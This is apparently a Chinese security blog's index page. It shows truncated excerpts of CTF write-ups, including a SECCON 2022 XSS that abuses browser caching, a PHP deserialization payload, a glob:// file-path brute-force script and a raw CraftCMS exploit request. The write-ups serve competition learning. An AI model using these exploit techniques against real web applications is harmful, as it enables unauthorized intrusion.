TEL

靜下心來尋找值得交付的熱愛

codeql yyds

兴致来了的安研（

幸而天佑，竟获魁首

CVE-2024-2016 这个编号还挺好看的.jpg

我菜爆了

好哦

看了一天，遇到好多问题，现在都把问题理清楚了 于是有了一份自己的 exp 如下 [SECCON 2022]spanote利用浏览器缓存 此处存在 xss，虽然是 GET，但是会检查自定义的 header，直接使用浏览器访问是 x 不到的 12345678fastify.get("/api/notes/:noteId", async (request, reply) => { const user = new User(request.session.userId); if (request.headers["x-token"] !== hash(user.id)) { throw new Error("Invalid token"); } const noteId = validate(request.params.noteId); return user.sendNote(reply, noteId);}); 但是搭配剛剛講到的 cache 行為，你可以： 用 ...

去年的鹏城杯，鄙人只做出来 1 题今年的鹏城杯，鄙人和队友一起做出来了 5/6 题 web1好简单的反序列化 12345$hacker = new Hacker();$h = new H();$h->username = $hacker;echo urlencode(serialize($h)); web2glob 协议爆破文件路径 123456789101112131415import stringimport requestsburp0_url = "http://172.10.0.5:80/"dic = string.digits + string.ascii_lowercaseres = ""for length in range(40): for i in dic: burp0_data = {"filename": "glob://./backdoor_" + res + i + "*"} r = req ...

ak 的队伍不少，意味着 Web 方向的题目中规中矩 craftcms感觉是网站根目录没有写权限导致的，换一个目录写，然后文件包含 1234567891011121314151617181920212223242526272829303132POST http://61.147.171.105:50610/ HTTP/1.1Host: 61.147.171.105:49757User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 767Content-Type: multipart/form-data; boundary=40226d1ab58079c727ec470ae0983832--40226d1ab58079c727ec470ae098 ...